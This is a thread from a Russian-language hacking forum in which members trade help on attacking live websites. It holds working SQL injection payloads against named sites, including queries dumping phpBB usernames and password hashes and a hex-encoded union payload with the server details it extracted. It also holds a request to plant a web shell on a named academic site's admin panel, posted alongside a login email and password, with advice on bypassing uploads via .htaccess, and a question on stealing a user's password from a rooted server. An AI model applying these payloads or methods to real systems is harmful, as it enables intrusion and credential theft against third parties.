Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. guezd

    guezd Elder - Старейшина

    Joined:
    31 Mar 2011
    Messages:
    250
    Likes Received:
    133
    Reputations:
    81
    phpbb 3.0.0 MySQL 4.0.27 blind inj


    Code:
    ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-
    Результат показывает.

    Code:
    ?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-
    Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе.
    2. Конвентируй в HEX, а не в CHAR.
    3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE.
    P.S. Не получиться, ссылку в ПМ.
     
    1 person likes this.
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    blind с выводом через union? как это?
     
  4. guezd

    guezd Elder - Старейшина

    Joined:
    31 Mar 2011
    Messages:
    250
    Likes Received:
    133
    Reputations:
    81
    это ошибка новичка =)
     
  5. Crouch

    Crouch New Member

    Joined:
    16 Apr 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?
     
  6. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Нет моя прога ошиблась (см. топик выше от XAMEHA)
     
  7. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    сам нашел
     
    #16587 vasykas, 26 Apr 2011
    Last edited: 26 Apr 2011
  8. Crouch

    Crouch New Member

    Joined:
    16 Apr 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Значит все дело в обработке intval?
     
  9. Fild3y

    Fild3y New Member

    Joined:
    13 Feb 2011
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    В поле авторизации пишу hi' or 1=1-- на сайте http://*******.tv/login.php И выводит You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' at line 4. Тоесть скуля:) Как такую крутить?)
     
    #16589 Fild3y, 26 Apr 2011
    Last edited: 27 Apr 2011
  10. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    а что непонятного?
    MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)'

    //для тех кому не понятно, то как бы закрыть надо её
     
    #16590 Seravin, 26 Apr 2011
    Last edited: 26 Apr 2011
  11. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Вопрос такого типа, как можно перехватить пороль(узнать) имея доступ на систему (root) FreeBSD 6.3, знаю есть хеш, но он не побираеться. уже 2 недели;( читал про затроянивания ssh, но он делает только доступ. Какие есть идет по перехвату пороля узера?
     
  12. assinjeans

    assinjeans New Member

    Joined:
    30 Jan 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    подскажите как сода залить шелл
    http://ptb.ib-pan.krakow.pl/admin/index.php
    [email protected]
    p162002b
    плз
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    создай (где нить в новостях) html форму аплоада и пробуй через /admin/upLoad.php
    или залей на http://ptb.ib-pan.krakow.pl/files/ .htaccess и пробуй другие расширение...
     
    _________________________
    #16593 shell_c0de, 27 Apr 2011
    Last edited: 27 Apr 2011
  14. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    функция mysql_connect

    Наверно наивный вопрос, но все же...

    Скрипт принимает данные и сразу же передает их функции mysql_connect().
    По результатам ее работы устанавливается флаг об успешной или неуспешной авторизации. Можно ли в эту функцию что-то такое пихнуть (хотя бы теоретически), чтобы mysql_connect() вернула true? В 2006 году был сплоит по переполнению буфера в этой функции, но тут он не подходит.
     
  15. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    //спецтема
    https://forum.antichat.net/threadnav91666-1-10.html
     
    #16595 ZARO, 28 Apr 2011
    Last edited by a moderator: 28 Apr 2011
  16. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Возможно ли через PHPList шелл залить?
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
    выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...
     
    _________________________
  18. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    Раскрутил как BLIND!

    database(): awah
    @@tmpdir: /tmp
    version(): 5.1.53-log
    @@version_compile_os: pc-linux-gnu
    user(): [email protected]
    @@basedir: /data/mysql/zehnder/
    @@datadir: /dh/mysql/ze_nder/data/
     
    #16598 LiRvD082, 29 Apr 2011
    Last edited: 29 Apr 2011
    1 person likes this.
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%280x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c76657273696f6e2829202d2d2031%29,5,6,7,8,9,10,11,12
    
    P.S. ну тебя же должно было смутить, что если ты пишешь в 4ое поле не число и тебе выдаёт ошибку mysql_fetch_array() то значит что этот параметр используется где-то ещё (для общего развития)
     
    #16599 Seravin, 29 Apr 2011
    Last edited: 29 Apr 2011
    4 people like this.
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не пойму как тут дальше выводить:

     
Thread Status:
Not open for further replies.